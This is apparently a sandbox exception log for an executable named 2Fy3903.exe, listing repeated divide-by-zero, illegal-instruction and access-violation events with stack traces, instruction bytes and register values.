__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26ebdb @ 0x143ebdb 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175224 registers.edi: 20990632 registers.eax: 0 registers.ebp: 5175252 registers.edx: 0 registers.ebx: 15392768 registers.esi: 19587072 registers.ecx: 0	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26ebdb @ 0x143ebdb 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 0 registers.ebx: 20518331 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26ebdb @ 0x143ebdb 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 0 registers.ebx: 20518331 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26ebdb @ 0x143ebdb 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518331 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26edca @ 0x143edca 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175224 registers.edi: 20990632 registers.eax: 0 registers.ebp: 5175252 registers.edx: 0 registers.ebx: 15392768 registers.esi: 19587072 registers.ecx: 403235871	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26edca @ 0x143edca 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518331 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26edca @ 0x143edca 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26edca @ 0x143edca 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26edca @ 0x143edca 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 0 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26eed8 @ 0x143eed8 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 20990632 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 15392768 registers.esi: 19587072 registers.ecx: 21507073	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26eed8 @ 0x143eed8 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26eed8 @ 0x143eed8 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 0 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26eed8 @ 0x143eed8 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: f7 f0 e8 6c 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15a5 exception.instruction: div eax exception.module: 2Fy3903.exe exception.exception_code: 0xc0000094 exception.offset: 1840549 exception.address: 0x13915a5 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 0 registers.ebx: 20518331 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26eed8 @ 0x143eed8 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518331 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26eed8 @ 0x143eed8 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26eed8 @ 0x143eed8 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26eed8 @ 0x143eed8 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:49 a.m.	stacktrace: 2fy3903+0x26eed8 @ 0x143eed8 2fy3903+0x26e007 @ 0x143e007 2fy3903+0x3623a3 @ 0x15323a3 exception.instruction_r: 0f 0b e8 41 40 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: 2fy3903+0x1c15d0 exception.instruction: ud2 exception.module: 2Fy3903.exe exception.exception_code: 0xc000001d exception.offset: 1840592 exception.address: 0x13915d0 registers.esp: 5175224 registers.edi: 5175224 registers.eax: 0 registers.ebp: 5175252 registers.edx: 2 registers.ebx: 20518374 registers.esi: 0 registers.ecx: 5175260	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x91425d 0x9140e6 0x912925 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x914350 registers.esp: 3861440 registers.edi: 3861492 registers.eax: 0 registers.ebp: 3861504 registers.edx: 7683224 registers.ebx: 3862628 registers.esi: 43293052 registers.ecx: 0	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d666eb 0x6d66177 0x6d66075 0x6d65219 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860312 registers.edi: 3860600 registers.eax: 0 registers.ebp: 3860320 registers.edx: 0 registers.ebx: 3862628 registers.esi: 44376044 registers.ecx: 45499100	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d666eb 0x6d66177 0x6d6608d 0x6d65219 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860312 registers.edi: 3860600 registers.eax: 0 registers.ebp: 3860320 registers.edx: 0 registers.ebx: 3862628 registers.esi: 44376044 registers.ecx: 46805920	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d666eb 0x6d66177 0x6d6608d 0x6d65219 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860312 registers.edi: 3860600 registers.eax: 0 registers.ebp: 3860320 registers.edx: 0 registers.ebx: 3862628 registers.esi: 44376044 registers.ecx: 43570240	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 39 09 e8 ae cc 59 65 89 85 64 fe ff ff 8d bd 5c exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d654ab registers.esp: 3860716 registers.edi: 3861456 registers.eax: 0 registers.ebp: 3861492 registers.edx: 0 registers.ebx: 3862628 registers.esi: 3861284 registers.ecx: 0	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d6b647 0x6d6b108 0x6d66075 0x6d65970 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860316 registers.edi: 3860628 registers.eax: 0 registers.ebp: 3860324 registers.edx: 0 registers.ebx: 3862628 registers.esi: 43023908 registers.ecx: 44882032	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d6b647 0x6d6b108 0x6d6608d 0x6d65970 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860316 registers.edi: 3860628 registers.eax: 0 registers.ebp: 3860324 registers.edx: 0 registers.ebx: 3862628 registers.esi: 43023908 registers.ecx: 46233304	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d6b647 0x6d6b108 0x6d6608d 0x6d65970 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860316 registers.edi: 3860628 registers.eax: 0 registers.ebp: 3860324 registers.edx: 0 registers.ebx: 3862628 registers.esi: 43023908 registers.ecx: 47584576	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d6bdfb 0x6d6b8e0 0x6d66075 0x6d65a72 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860328 registers.edi: 3860628 registers.eax: 0 registers.ebp: 3860336 registers.edx: 0 registers.ebx: 3862628 registers.esi: 43023908 registers.ecx: 43279824	1
